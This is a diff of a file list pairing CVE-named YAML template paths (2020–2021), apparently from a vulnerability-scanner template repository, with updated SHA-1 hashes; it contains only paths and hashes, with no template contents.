+http/cves/2020/CVE-2020-25864.yaml:944d9a8e1e54965fd46c513a7413fa13509f4a78
+http/cves/2020/CVE-2020-26073.yaml:793eb5c47388abfea3111d98fc083ef549f2f51f
+http/cves/2020/CVE-2020-26153.yaml:1a20e2dd7fadc2d1738269e50f5c07f96b060b6c
+http/cves/2020/CVE-2020-26214.yaml:87d7caa48e7bfd0fbee42ed497f0b58ee121a203
+http/cves/2020/CVE-2020-26217.yaml:cdbbb2fa2d9c90b1e6123c4ac6b82761c40641e3
+http/cves/2020/CVE-2020-26248.yaml:ae918a8975d55fc5d4f7fac85014971d734b1f51
+http/cves/2020/CVE-2020-26258.yaml:59e707d720d01a86f03013fea74e4363a4ab8026
+http/cves/2020/CVE-2020-26413.yaml:8f1a8b8dacd2eb8c42d35b6d4780ad1a55b9e16c
+http/cves/2020/CVE-2020-26876.yaml:4986efaaf7fd98ddc499bded2f42afd942828696
+http/cves/2020/CVE-2020-26919.yaml:b2b41f27970c494f0d3fd27dcbeef26ef37472be
+http/cves/2020/CVE-2020-26948.yaml:853254159debc9eaa2d0fa4e89de16fec4f4ea73
+http/cves/2020/CVE-2020-27191.yaml:84ecbf468b2193fdc0e9c23ff9a933e7e71df4d0
+http/cves/2020/CVE-2020-2733.yaml:764e634cc66b30e30c49b8673923419355f2f15b
+http/cves/2020/CVE-2020-27361.yaml:62e15d8e22702d4c7067ddb9eefd5731f9eff3e2
+http/cves/2020/CVE-2020-27467.yaml:ecc8c611a64a5518cd98675b2bf6f9b367b99466
+http/cves/2020/CVE-2020-27481.yaml:9209c6f13f38a8bee97f6e11de0e2a4a6563b249
+http/cves/2020/CVE-2020-27735.yaml:02b55dffc439c23f319b2079e403dc3b40116ddc
+http/cves/2020/CVE-2020-27866.yaml:80cc6098750162e069b7df1165f850be45b0084a
+http/cves/2020/CVE-2020-27982.yaml:681565abcb54deeeb03c9ed7925241a8326441f1
+http/cves/2020/CVE-2020-27986.yaml:b96aee8397bdcc4e42a2c081d3c010f04a897799
+http/cves/2020/CVE-2020-28185.yaml:777dad1afc173e3e46c77bc95a0f5a0fc25ec3ef
+http/cves/2020/CVE-2020-28188.yaml:7610315cc83fe183a84755f31588d670ee02b4d7
+http/cves/2020/CVE-2020-28208.yaml:8433350daeec94f9ba7d8390844b968b619e1ea4
+http/cves/2020/CVE-2020-28351.yaml:fd293babf3398904fb6f5abd341f4a080645906b
+http/cves/2020/CVE-2020-28871.yaml:4c448eda771743ef6b72d3cd6d251b5b37c2a402
+http/cves/2020/CVE-2020-28976.yaml:c9ff25ed08ff566680eaf87669a0ade1f4c70f3f
+http/cves/2020/CVE-2020-29164.yaml:76bfdf186bdd649c16fc74026101e39bd8346ced
+http/cves/2020/CVE-2020-29227.yaml:220d89379fdac4406b3ea00c90b71aa1632a77f9
+http/cves/2020/CVE-2020-29284.yaml:438af2723b9d4355e2e755af7fecfe11460bd16e
+http/cves/2020/CVE-2020-29395.yaml:f051cc7d177b2907541c5dd1cd021f41cffd6cdd
+http/cves/2020/CVE-2020-29453.yaml:ede2bf153434a346f8c2ea4379c7681b6f268bb1
+http/cves/2020/CVE-2020-29583.yaml:07f9eb905ce1b384dab3ac69c8aa8daa9fc90e0c
+http/cves/2020/CVE-2020-29597.yaml:37ed49d8f0cab75a02d133ecdcf387619b5e3be9
+http/cves/2020/CVE-2020-3187.yaml:0404a90a80fcda6d340c4c4991e9262bd6c00851
+http/cves/2020/CVE-2020-3452.yaml:87bb1d58277a3308e98fb749fa585cbdfe30908f
+http/cves/2020/CVE-2020-35234.yaml:47242511d64cda582e22411d3fe077206e7a45ca
+http/cves/2020/CVE-2020-35338.yaml:a900d8e737e7a24f3ece30cf0a9c831f069151ee
+http/cves/2020/CVE-2020-35476.yaml:e6e6f21536bdd6842e69527ccd7344d509ea5602
+http/cves/2020/CVE-2020-35489.yaml:97b9c92f752e88d6555f2c3a154f85b1596a5a90
+http/cves/2020/CVE-2020-35580.yaml:c3d97357a2a71ef537434353c48f93a7194356da
+http/cves/2020/CVE-2020-35598.yaml:b4ae685b931d356a7c3540f99b8e98024f5939db
+http/cves/2020/CVE-2020-35713.yaml:775cea4cdc6358157608cf2214bec0b9aa9adfc7
+http/cves/2020/CVE-2020-35729.yaml:57884cb2c2a3176ac482c873a92aecca77dbbaf9
+http/cves/2020/CVE-2020-35736.yaml:815c1ca4c2a3261233dd2606346f819860941679
+http/cves/2020/CVE-2020-35749.yaml:9e8400f2306259191a3db6a044f98d943f78ecc4
+http/cves/2020/CVE-2020-35774.yaml:96d9409ebe45b1e0ade8a7a6c7226ea9b92691dc
+http/cves/2020/CVE-2020-3580.yaml:9bacaf5861ab14282d2167c48e72092e23ea6b89
+http/cves/2020/CVE-2020-35846.yaml:d4a7eb1aff6aac99b6631c1f06c5b9c05e78e3d5
+http/cves/2020/CVE-2020-35847.yaml:0c5c7cc7cfb0a336f170e84c53f05d16b40ac1dd
+http/cves/2020/CVE-2020-35848.yaml:f851a435886bd723eb46ab8cc7baad5dc246d40f
+http/cves/2020/CVE-2020-35951.yaml:f4a626f26cfa8817ad97fc7dd1087a730c4aedc8
+http/cves/2020/CVE-2020-35984.yaml:cb7d115135f66cac0d1bfb5d982b1a2ced2606ad
+http/cves/2020/CVE-2020-35985.yaml:dea264682b95078f42fc588c3d250a02a43b4e26
+http/cves/2020/CVE-2020-35986.yaml:71aa8deb0485048ee3ea97285e72a26040486cc5
+http/cves/2020/CVE-2020-35987.yaml:9041e09fc5f8d0ff6a8c933d043e3c39c74bbdcc
 http/cves/2020/CVE-2020-36112.yaml:bfb714794579e8941b014f9250bdecf9fa83d7fc
-http/cves/2020/CVE-2020-36289.yaml:c23fd37d175e80a49c538e71d88db156b5321f79
-http/cves/2020/CVE-2020-36365.yaml:cc7cecda5d1cf81cf80b8d7b7565cdeb9c345910
-http/cves/2020/CVE-2020-36510.yaml:0b97ccf4e014ade2b5bdf2eac978fc2227e7ff70
-http/cves/2020/CVE-2020-4463.yaml:2bed00d8f63805106c964b73d50b61db39b9b345
-http/cves/2020/CVE-2020-5191.yaml:31dbf160d8fe6580f164bc05786aeccbdf1e67a1
-http/cves/2020/CVE-2020-5192.yaml:6784ad58a6898c72633b264e887663570771f548
-http/cves/2020/CVE-2020-5284.yaml:9b33ae4457c58db65ff2e99f33ea8fcb7f945f3f
-http/cves/2020/CVE-2020-5307.yaml:266e28d6fec47e0272d8d4bd2e37a1a8a6be7c5d
-http/cves/2020/CVE-2020-5405.yaml:c609d2111f03787e0f49ff2e614435c48c806a22
-http/cves/2020/CVE-2020-5410.yaml:5b48bf72ac4d68b54386fc5019f052f334ae20e7
-http/cves/2020/CVE-2020-5412.yaml:c75cf947284e053dd75ce07b98a5e8c7e9dbaf06
-http/cves/2020/CVE-2020-5775.yaml:ddb642e721a32b03b3ba97fe6d3464e9891fffce
-http/cves/2020/CVE-2020-5776.yaml:8e88a21e60e2c0ccb97acc45076df88719899a37
-http/cves/2020/CVE-2020-5777.yaml:090144fc9d5c1b92b22f5fe0d0f1339c8d671b32
+http/cves/2020/CVE-2020-36289.yaml:e55305b762b0b2df49e5f8b6bec40df59152a277
+http/cves/2020/CVE-2020-36365.yaml:b091623045555f6ceed542e3c9a696a7300a33ef
+http/cves/2020/CVE-2020-36510.yaml:258644b93509168b2a9ea403dcbf89e6d5697b02
+http/cves/2020/CVE-2020-4463.yaml:70aebfb16b188166e46f06b5c44856a2503e5dbd
+http/cves/2020/CVE-2020-5191.yaml:86e907b71d0d9dc5487ec3e595acdfc15dcacdb3
+http/cves/2020/CVE-2020-5192.yaml:deb0f56875e248f8621c131b474787c736a6d9e6
+http/cves/2020/CVE-2020-5284.yaml:36f89425d662bc99d40c9c52451ec7ebd48073ba
+http/cves/2020/CVE-2020-5307.yaml:53573c021a290aeb94676454908220cb1385923e
+http/cves/2020/CVE-2020-5405.yaml:3babb9fba7f757e73eab63a71856a3349a271938
+http/cves/2020/CVE-2020-5410.yaml:5510422bfc566ce1b62c77dc0acc7f53d78a8c48
+http/cves/2020/CVE-2020-5412.yaml:a984a878e28a4a917e71d49464ee1135d7d74ee8
+http/cves/2020/CVE-2020-5775.yaml:d93840f09c699523c4fc8a1d6713348424dd1021
+http/cves/2020/CVE-2020-5776.yaml:0db504c2185bbaacd4867d4c9c26820592d9e076
+http/cves/2020/CVE-2020-5777.yaml:711dc669c5db72477d3b57c78ca941fc63759d51
 http/cves/2020/CVE-2020-5847.yaml:df460519b79bfbf1d3d68f2baa3b0690de5d3f29
-http/cves/2020/CVE-2020-5902.yaml:84b48f6fd3af5ee07f831a09dcd1becedfeb3f0e
-http/cves/2020/CVE-2020-6171.yaml:35e4b5e67e292d5ba7faea9af5ff69202b3f6638
-http/cves/2020/CVE-2020-6207.yaml:4004908344d89b48b6058d905f110f6eeee9ed8a
-http/cves/2020/CVE-2020-6287.yaml:1aac84da8832cc225c4314fe1bc87573d15d2449
-http/cves/2020/CVE-2020-6308.yaml:99455290f542c9d78e62d1ce769735ab4e06f9e4
-http/cves/2020/CVE-2020-6637.yaml:2535ee9209808c9c933b449853d331997895dd91
+http/cves/2020/CVE-2020-5902.yaml:d7ce022c3c7599ce8fde5e5eea8beebbdbc80996
+http/cves/2020/CVE-2020-6171.yaml:a9b364e1672f07b6196734e2daeade56a900fcbc
+http/cves/2020/CVE-2020-6207.yaml:755a42a91ad0df0c5664d998ca7984e4a19fe981
+http/cves/2020/CVE-2020-6287.yaml:3244ea9e31e91a3ac83c9ef188f72d2e4907a735
+http/cves/2020/CVE-2020-6308.yaml:c7447145be7462ce81b38d0720c758d0c4d5fd74
+http/cves/2020/CVE-2020-6637.yaml:29b6614c20481eee5702b5beb8a10db49ae52d6d
 http/cves/2020/CVE-2020-6950.yaml:63785d8833670bf1d3670e7978bcecf19625fad0
-http/cves/2020/CVE-2020-7107.yaml:7a6d6d5473cca269b097884d5ca02a09c8762807
-http/cves/2020/CVE-2020-7136.yaml:bfc69189a0a54fa525a6e63ff277a77b609ba381
-http/cves/2020/CVE-2020-7209.yaml:7c5c405c1105dc17844db4cb44d098b51e23baa1
-http/cves/2020/CVE-2020-7318.yaml:6343dd9eca1e8dd74c91fb42ed40d21ee10ef613
-http/cves/2020/CVE-2020-7796.yaml:f279e33b42fd13db32ed6d147035bb79d3c0891e
-http/cves/2020/CVE-2020-7943.yaml:42e0925c5e14e37830ee1b9535db25f4955eee04
+http/cves/2020/CVE-2020-7107.yaml:96d9406deee4c3efc2b81ef286082ceceed91e93
+http/cves/2020/CVE-2020-7136.yaml:6300dd4522fa0ff952f2486f106edda25f1d678f
+http/cves/2020/CVE-2020-7209.yaml:de5b20d5def80ee4ff0496e74a78055034cb42e7
+http/cves/2020/CVE-2020-7318.yaml:4a430fbccdfb720713f7f169eb99336fd7bec17c
+http/cves/2020/CVE-2020-7796.yaml:8b9f90c70751fbe8847b10771f1cdcb9c03ab69b
+http/cves/2020/CVE-2020-7943.yaml:d675e1c0c9bdd71ce3756212c1b3bc688a73917c
 http/cves/2020/CVE-2020-7961.yaml:e72d2f6dea7fae33a8509824ca1e12e675ab2b67
-http/cves/2020/CVE-2020-7980.yaml:0fd9455be52530497f29ab915b98a5a8cb4f3aa2
-http/cves/2020/CVE-2020-8115.yaml:bd291dd37103d429ea19c3bb0d1ed6a6b7427d99
-http/cves/2020/CVE-2020-8163.yaml:e852bcf90d2fc4dc4ee0ce575522176680c04e8f
-http/cves/2020/CVE-2020-8191.yaml:b4e870130ea2ec7721a1edab5106bbed24ec7b77
-http/cves/2020/CVE-2020-8193.yaml:66f6193aa34b71115606cd37df7df20ff1cd752e
-http/cves/2020/CVE-2020-8194.yaml:49a7d6242f7a078a1c99f2b49782e97025713c81
-http/cves/2020/CVE-2020-8209.yaml:f5b73d36f5eff231243643459781501cbec6301e
-http/cves/2020/CVE-2020-8497.yaml:54fa025e2112e924de644b670464cbf3c6343dbb
-http/cves/2020/CVE-2020-8512.yaml:3b4ce9021604ab59e6dce6d3b67dfb3e9c19e3fa
-http/cves/2020/CVE-2020-8515.yaml:8400d0efc79896c200542089d81fdd82463b936c
+http/cves/2020/CVE-2020-7980.yaml:90bf5a798c9f0e40646e2ed9e97a91421e97a613
+http/cves/2020/CVE-2020-8115.yaml:3a49952a84a608e74856f9554c5b506cc5a28dc2
+http/cves/2020/CVE-2020-8163.yaml:17137924d633e2027bad96a803e2258b9375f4f1
+http/cves/2020/CVE-2020-8191.yaml:59177f5d1c30aab00e70faf0a7d5bc158433161d
+http/cves/2020/CVE-2020-8193.yaml:acf983c3664304c194d1bb3b6291e41261d7f2f6
+http/cves/2020/CVE-2020-8194.yaml:7536239e7e6ed350b5b208094d4fd4edb7554507
+http/cves/2020/CVE-2020-8209.yaml:924e8f65d768fa8b3603b51f838be7d1b7574b6b
+http/cves/2020/CVE-2020-8497.yaml:58901b68db57c4e9d023bf8e63b3dd8129b0ac3c
+http/cves/2020/CVE-2020-8512.yaml:1dcfe9c5817e60ce8b1c3e5141a23ffebce286ca
+http/cves/2020/CVE-2020-8515.yaml:634853a56cbd175158a1c389ed219116c6e6b8d0
 http/cves/2020/CVE-2020-8615.yaml:dd209446e89204d0a404ca5a6538a9ce0f7be4f8
-http/cves/2020/CVE-2020-8641.yaml:1afbb4a044854f8559c6764836459ec23992d503
-http/cves/2020/CVE-2020-8644.yaml:a6a023d1aafa262d6130806b8545694b64bdab10
-http/cves/2020/CVE-2020-8654.yaml:7602aebfdc81146c089d009ec3ebdbb8372c0d05
-http/cves/2020/CVE-2020-8771.yaml:4a2c0756e54c060577584dd57a751e4eade673ae
-http/cves/2020/CVE-2020-8772.yaml:ee194cc865a15c4dd39649fbd7a50048478565cb
-http/cves/2020/CVE-2020-8813.yaml:dbfc3925b44cf66b9c8dc529f38722319031dfe9
-http/cves/2020/CVE-2020-8982.yaml:e6c425724493310341d50a3f2efdfc29ff3d1eba
-http/cves/2020/CVE-2020-9036.yaml:43cab34fdb4a24bdaedcdbb262ba5447b41fe907
-http/cves/2020/CVE-2020-9043.yaml:962227e38093f0cad815034cb96ab47a81cbed7d
-http/cves/2020/CVE-2020-9047.yaml:a3264bafe6098af3b9a4aa6afb93c514137d50b9
-http/cves/2020/CVE-2020-9054.yaml:e01e3dda346e5c3ae772a1b748a6133f80afc868
-http/cves/2020/CVE-2020-9315.yaml:9176056c732867679f65ec1c4f3fb19612c1e6bb
-http/cves/2020/CVE-2020-9344.yaml:79322886356e8599a9eead2d2caca63741680d71
-http/cves/2020/CVE-2020-9376.yaml:1b60479949189dbcec72955fa767a5a46773e665
-http/cves/2020/CVE-2020-9402.yaml:7f69e45d4522897981a85e70d6a4c9f99ae7a382
-http/cves/2020/CVE-2020-9425.yaml:8157340871cec44f4a2a161e05bb6d7093061507
-http/cves/2020/CVE-2020-9483.yaml:8093e9c282e537006a8f00f3189aacbf9e0f60a3
-http/cves/2020/CVE-2020-9484.yaml:3b4322010eb495994d14c229ff7b1652df59e4ea
-http/cves/2020/CVE-2020-9496.yaml:f45c94d309c85519a570143febd5fb11c35003de
-http/cves/2020/CVE-2020-9757.yaml:e1a8b1e5adaa341bb21948f51ebc6a01df399b1b
-http/cves/2021/CVE-2021-1472.yaml:bc0a2e1a90a3e94097543b30820f7669a4b082e1
+http/cves/2020/CVE-2020-8641.yaml:9d745c9589fff85d4a67af07c84e283a8a946176
+http/cves/2020/CVE-2020-8644.yaml:b6259bc0a07397eaa2b993edae8d43fbbb5393b4
+http/cves/2020/CVE-2020-8654.yaml:57942f2599bcebea42167c1dad370be84bdb9e24
+http/cves/2020/CVE-2020-8771.yaml:b7f855bf2df83d915f16f8db7455a31806fe199e
+http/cves/2020/CVE-2020-8772.yaml:5221564d1e9d582aeafb8ad86d92e5663bb6dbdd
+http/cves/2020/CVE-2020-8813.yaml:7c2cd8f7360a0d50588011e6d1c0b6937936183e
+http/cves/2020/CVE-2020-8982.yaml:746d71d9f8b5a69313252d9d1a3a084ce80b79ac
+http/cves/2020/CVE-2020-9036.yaml:17a33a8de0c6d71a045cdca8b03ca8f9a1158db1
+http/cves/2020/CVE-2020-9043.yaml:b81a3223f35799bae55d1b42d50dab012d3ae78e
+http/cves/2020/CVE-2020-9047.yaml:a5dc6e25b04d2224d0228a28ab9692c11aa8012c
+http/cves/2020/CVE-2020-9054.yaml:bdc47ca8ddb23873f89952fbaa6b8a77c623ae69
+http/cves/2020/CVE-2020-9315.yaml:36cc07e37fdf09b665c80185118fd5c62d1ec8be
+http/cves/2020/CVE-2020-9344.yaml:a7c15e6139e04b772c2e6296366455c83d917bd2
+http/cves/2020/CVE-2020-9376.yaml:80495eff882e917e206f0b5ea1897a6e62a3c298
+http/cves/2020/CVE-2020-9402.yaml:92da9f1a583c38fb07992e160e2a622e7270b0be
+http/cves/2020/CVE-2020-9425.yaml:151380fef33f25c0f38877d956f7afbcb3b22ed4
+http/cves/2020/CVE-2020-9483.yaml:6ba6ec4e2de9c7ce4d3533ee8343cd0898ea559c
+http/cves/2020/CVE-2020-9484.yaml:0e9d4e387639a7fbcb75a991e03eb0b6967a4786
+http/cves/2020/CVE-2020-9496.yaml:8c017493807e9b9fe95e2ae588a2b2cf672a6980
+http/cves/2020/CVE-2020-9757.yaml:2bfc7969b43143700213c96f1fec5a5182c55486
+http/cves/2021/CVE-2021-1472.yaml:85e42626b151110b0c9ceca7448387812a132aad
 http/cves/2021/CVE-2021-1497.yaml:df17d4c795a8480d43c41a4531fa7a5fbf8ef751
-http/cves/2021/CVE-2021-1498.yaml:e9037502a72d59ec46704798748dbe9c58f05025
-http/cves/2021/CVE-2021-1499.yaml:28e29afebb2b10f5036f02e038fceb76ee595ee7
+http/cves/2021/CVE-2021-1498.yaml:ad28479f1c22f654c7c79322bcbdbe5f7760a086
+http/cves/2021/CVE-2021-1499.yaml:976890a376e22955a7a374fa1440a8c984250bc1
 http/cves/2021/CVE-2021-20031.yaml:658fe9212845679257a441af2d041148cd6a4c42
-http/cves/2021/CVE-2021-20038.yaml:04d48e28468c405a6872ef51850ffe8f2d4812a2
-http/cves/2021/CVE-2021-20090.yaml:0bd5e7d277844cf6cda2c7352c53f352f1d2d7ca
-http/cves/2021/CVE-2021-20091.yaml:142dfd26ede0f1df78a9e476022941c75a6c7ce0
-http/cves/2021/CVE-2021-20092.yaml:940fe36f0b27b7ce9d3bbd9cb79aa2aff86090db
-http/cves/2021/CVE-2021-20114.yaml:2810cae8955abd0ae2e5a559d6bb7ce4673e8d8d
-http/cves/2021/CVE-2021-20123.yaml:560e283846d0b975d19fc6901da9b48904c2d8fd
-http/cves/2021/CVE-2021-20124.yaml:a5cf44b0522c67f8c01062456462ef6f6ec7efe8
-http/cves/2021/CVE-2021-20137.yaml:905449b655299f2cf6137081dc4138bc45af535a
-http/cves/2021/CVE-2021-20150.yaml:10f9fe28f8282f2a731adc41614342f31eefad5b
-http/cves/2021/CVE-2021-20158.yaml:7397a81103eb7cbc921f47d5d2705e47aca897d9
+http/cves/2021/CVE-2021-20038.yaml:7f717d9dd014c11586cc5c1f57a9a97d1d297dd3
+http/cves/2021/CVE-2021-20090.yaml:f59add4a116d7dc0acf5876597a1ff71b9e946b4
+http/cves/2021/CVE-2021-20091.yaml:f746a228e338e6845c705b53e572e324f10fddb7
+http/cves/2021/CVE-2021-20092.yaml:5b75e80802e5da52f5a8108917afa9f5e68851b6
+http/cves/2021/CVE-2021-20114.yaml:95a7b948b75d34df0b1b3054682f59754895e7ce
+http/cves/2021/CVE-2021-20123.yaml:bf633d995d6f281576f7164314f65eb0634095cc
+http/cves/2021/CVE-2021-20124.yaml:f13ed432a0d4a742dcfd133bdba2c7b771eff0b5
+http/cves/2021/CVE-2021-20137.yaml:bb393be165c2992e5393611d4b54d678ba1daf68
+http/cves/2021/CVE-2021-20150.yaml:5fab7ec610aab03c856525e0866b0b400c788e40
+http/cves/2021/CVE-2021-20158.yaml:085dd4e5df5f025de7f429562db38fa2dd15faa9
 http/cves/2021/CVE-2021-20167.yaml:7b448aaa0c1e2b16b73ee4d19b6b4a3b5502ddde
-http/cves/2021/CVE-2021-20323.yaml:5bbf0719d8d6bf543186596917dfa7524d694aa2
-http/cves/2021/CVE-2021-20792.yaml:68cc9b0a5f5291088449f3b86cc78d64f0bf7ff7
-http/cves/2021/CVE-2021-20837.yaml:4b5141ab421dd8ca80aa3cc61fe4442dadf44656
-http/cves/2021/CVE-2021-21087.yaml:2ebc7022a65c54325f2c4a3e449e778965fdbef3
-http/cves/2021/CVE-2021-21234.yaml:9d59071a51b8f975110185dd59786765752abbed
-http/cves/2021/CVE-2021-21287.yaml:a5f6abd8e7091adea222b2f64813f9782e8e5f63
-http/cves/2021/CVE-2021-21307.yaml:6330947cfe7db207777f92056a66c6cd467cee0d
-http/cves/2021/CVE-2021-21311.yaml:3655c62045ab57043f0551d0291dde1c71f77f1c
-http/cves/2021/CVE-2021-21315.yaml:c169649abbd699ca1491e910680c6f3211d9e046
-http/cves/2021/CVE-2021-21345.yaml:87684167d6a334d05822ee2c28a038d50e592b60
-http/cves/2021/CVE-2021-21351.yaml:01d6904f83a067afa3d999c5883e63bb6646c21a
-http/cves/2021/CVE-2021-21389.yaml:9362c913f7a1da5421fe14f7520cca55e248e26f
-http/cves/2021/CVE-2021-21402.yaml:e3480c99b433efa3564590d181f8f2e944c40bae
-http/cves/2021/CVE-2021-21479.yaml:6a11fc1089eb47fb7781bc427179bd2be436053e
-http/cves/2021/CVE-2021-21745.yaml:8e10518399cc1298d4421d56400a561156a61f9b
-http/cves/2021/CVE-2021-21799.yaml:063fbbaf502ccaeb43aa0f2b013ad1fdf5dfd84d
+http/cves/2021/CVE-2021-20323.yaml:48c1374c356d842a8705bf77ddebad591e53720b
+http/cves/2021/CVE-2021-20792.yaml:b755bd3138e5e43d2a4d8e02e5d952896bc67d3d
+http/cves/2021/CVE-2021-20837.yaml:2e547cefe7424840e41a3e5ea5a74bffce75216e
+http/cves/2021/CVE-2021-21087.yaml:3b3edaed245e7f503a9d38e7c08b2f97c264b8ce
+http/cves/2021/CVE-2021-21234.yaml:c1899888ad89a95b62819c91a03434793dc613d4
+http/cves/2021/CVE-2021-21287.yaml:9b449bf6bec9104535b4c108c8f54ea7a9cd2551
+http/cves/2021/CVE-2021-21307.yaml:4afef661aab4a59003752a228105254e0e9f6f8c
+http/cves/2021/CVE-2021-21311.yaml:54c1075e6d29b767dac52d1450dd6080dd37e905
+http/cves/2021/CVE-2021-21315.yaml:0fbdfac886ea0d3fedb140ad626dd1e70f92395f
+http/cves/2021/CVE-2021-21345.yaml:f8833f19382f128a78f1365a2eb17d0004ff0c8f
+http/cves/2021/CVE-2021-21351.yaml:67929bdcd3f93a1636228bf85776f37950775c38
+http/cves/2021/CVE-2021-21389.yaml:5b569e0fbfdba771a55853bb10ac090efc24fa79
+http/cves/2021/CVE-2021-21402.yaml:c06eaac1a23a94d1c88b31073a126ba1f2ea2ccb
+http/cves/2021/CVE-2021-21479.yaml:af8f9e93dc3497e0a8d2eac3d72e39d2c0ec121b
+http/cves/2021/CVE-2021-21745.yaml:54208dde20d502425db8911d1f9013784f4d41d6
+http/cves/2021/CVE-2021-21799.yaml:9f879454e1df82701ebd282fc68350314b8639b2
 http/cves/2021/CVE-2021-21800.yaml:f662ae289d13c01e64e1880a63ca204bf7eb8952
-http/cves/2021/CVE-2021-21801.yaml:07eedc6398db6d7930d3bab088d35e965cac8680
-http/cves/2021/CVE-2021-21802.yaml:84f7db98a0097f90c326977d18f96698357225e7
-http/cves/2021/CVE-2021-21803.yaml:da645497ea72a16fcbbd91eb797a426f4a2030ef
-http/cves/2021/CVE-2021-21805.yaml:5693999662efabc73ee41a8bc785a9f3df0070b4
-http/cves/2021/CVE-2021-21816.yaml:ebddd5d675ca1702850b4b8993e58752199daf55
-http/cves/2021/CVE-2021-21881.yaml:2bdb2cae11629315765ea2b2ff042eb6818d03ad
-http/cves/2021/CVE-2021-21972.yaml:d7a07d989dfcf931dc7f8c5e4437ec7f54228e0b
-http/cves/2021/CVE-2021-21973.yaml:936620dfa0f6662565c827c32a977e8457c53150
-http/cves/2021/CVE-2021-21975.yaml:5c5e476e85c8bd170fa246be2085a2add090aeb9
-http/cves/2021/CVE-2021-21978.yaml:65cd97381df4142127dbbc9299fbccbc0f775eeb
-http/cves/2021/CVE-2021-21985.yaml:6afda69dc138fe54aaa40cdb732c8dfb177a063e
-http/cves/2021/CVE-2021-22005.yaml:534ff52bacbec3b0993ea2c1043835d5fbd6e6b4
-http/cves/2021/CVE-2021-22053.yaml:fd75a1bc2b722a3517780869bd5dfa72df9e82a6
-http/cves/2021/CVE-2021-22054.yaml:328ffec0570397618d99d2a52259a492634d18ca
-http/cves/2021/CVE-2021-22122.yaml:c01a3acde121b83e0222811d844eba4d26cb03de
-http/cves/2021/CVE-2021-22145.yaml:7b5c3af74fb37649c533402925ef86a5c92a6947
-http/cves/2021/CVE-2021-22205.yaml:3fb4418f2eceadfb8e7fe484006853ff78593856
-http/cves/2021/CVE-2021-22214.yaml:f210d456cf202003024a85ccccb5a60b7c80348e
+http/cves/2021/CVE-2021-21801.yaml:ae01263c336677b33c86bece084d59ae7b56abb5
+http/cves/2021/CVE-2021-21802.yaml:be75cb2cf376be957291314f83a4d7a00dcca843
+http/cves/2021/CVE-2021-21803.yaml:436e62e8fd6b634df0eb83666cdf32f570a6a905
+http/cves/2021/CVE-2021-21805.yaml:1e0d13510107415d2572d518eac5a2a8fb6272d4
+http/cves/2021/CVE-2021-21816.yaml:9e88e235e5bc9ce13198be27fbcc9fa519386cda
+http/cves/2021/CVE-2021-21881.yaml:a132dd40aab1459cd0cfd49904d21bb62a3113c8
+http/cves/2021/CVE-2021-21972.yaml:4abee84a0d165186ada946d302967dfb02291c2e
+http/cves/2021/CVE-2021-21973.yaml:3eb80e090bc38d58e07b773d6b1082e17d2af761
+http/cves/2021/CVE-2021-21975.yaml:58f23abf3a5dc27c734834e339f7f4a521d83ecd
+http/cves/2021/CVE-2021-21978.yaml:bd1efa0c8291dffe302aa4f9cfdf92becf6d8009
+http/cves/2021/CVE-2021-21985.yaml:45fb3ffe4773b17f5ec01a0822943e0b16e6fe82
+http/cves/2021/CVE-2021-22005.yaml:ad8a3a1bb08da710f4b84069736d8efc7dc3f6cc
+http/cves/2021/CVE-2021-22053.yaml:4d84f15299cab162dc81e8101cf3fc2cb8549ac4
+http/cves/2021/CVE-2021-22054.yaml:aff1d3ad8405c88a0f0acdc6b829bedef53ac39c
+http/cves/2021/CVE-2021-22122.yaml:3fd42c4975177651ac448e8aa5c8ea4f3f6516db
+http/cves/2021/CVE-2021-22145.yaml:57bbe3bf8cec257bb8cabc6cdbb89b2723d92827
+http/cves/2021/CVE-2021-22205.yaml:5e76796e761a3d4fea2790d62d057808a221be2b
+http/cves/2021/CVE-2021-22214.yaml:1facb007ed7bfdbacfe708771069ce5ab0fb5c76
 http/cves/2021/CVE-2021-22502.yaml:55f1f8d0f63eacf0fc110b748b2d99abafdb9904
 http/cves/2021/CVE-2021-22707.yaml:e7624f5fa3b86acead6d0ca47187f95692e372b0
-http/cves/2021/CVE-2021-22873.yaml:a329a3407cf03ae4e734a79c9300533a8ee73863
-http/cves/2021/CVE-2021-22911.yaml:51e03bbc34a4f5988b26b31bd3dbaf9fe92323f6
-http/cves/2021/CVE-2021-22986.yaml:a7ec063298fa7453bd12e1a5cc9829b72f896852
-http/cves/2021/CVE-2021-23241.yaml:97f0d8212885c1b511f53fa7e34344f013b7e6c6
-http/cves/2021/CVE-2021-24145.yaml:49cf9b6d0573d184d7133e76d52e97e4cdb666a4
-http/cves/2021/CVE-2021-24146.yaml:ba23bfa7bf49e63005f7b71406eebcf41d1feb5b
-http/cves/2021/CVE-2021-24150.yaml:7e11ad871ff6c3de634506c1d60cb32f0b26d54b
-http/cves/2021/CVE-2021-24155.yaml:d727e21742139d29f34500e365d9596e54fc23e3
-http/cves/2021/CVE-2021-24165.yaml:f5e7c3faa43ae713ad7add2276b97c3980943105
-http/cves/2021/CVE-2021-24169.yaml:e03891759b5551277fc8d941b2125ab575c1e949
-http/cves/2021/CVE-2021-24176.yaml:9a90621893ea9d005ff9f487c934830145a6574b
-http/cves/2021/CVE-2021-24210.yaml:e138d4e54e23b932a19d10764162872ae96ac59d
-http/cves/2021/CVE-2021-24214.yaml:a4712f2d596864eb302e58b27e7d0675b8e88d5e
+http/cves/2021/CVE-2021-22873.yaml:2e48519bc8911d358b3837c17962eb7183019865
+http/cves/2021/CVE-2021-22911.yaml:6fc175ebb3bcee5645269adda223a9c4eec97f00
+http/cves/2021/CVE-2021-22986.yaml:8ce8cd03c98eb75b8fd9dbcb5addc54b98cbcf5c
+http/cves/2021/CVE-2021-23241.yaml:35864fbf314e163f4ed4a4eda8024fc15e9020f6
+http/cves/2021/CVE-2021-24145.yaml:ed8bc7bebb8a0c595f8356af7b3c868024f896e0
+http/cves/2021/CVE-2021-24146.yaml:0a99d18eed1060e4bc60e0bd413015a523d15cd5
+http/cves/2021/CVE-2021-24150.yaml:167f0a9241436db7b9566079bce9f9cb1806d23d
+http/cves/2021/CVE-2021-24155.yaml:d03f30389e8e5e078a4714c9f37f88cc2f0d85e9
+http/cves/2021/CVE-2021-24165.yaml:140763bfe26fcdc2b7f12b0c136f15c053d66e75
+http/cves/2021/CVE-2021-24169.yaml:42fbd355bb72b553c58a3f5f6885e0aaecd7607f
+http/cves/2021/CVE-2021-24176.yaml:0b1e02a344c187736e248f46bea8111203dd3ef6
+http/cves/2021/CVE-2021-24210.yaml:5faabf9f28469d0a644adc7c6b967cb863e7c543
+http/cves/2021/CVE-2021-24214.yaml:9b6ccef02f5cdd45761491846b7260727b00417d
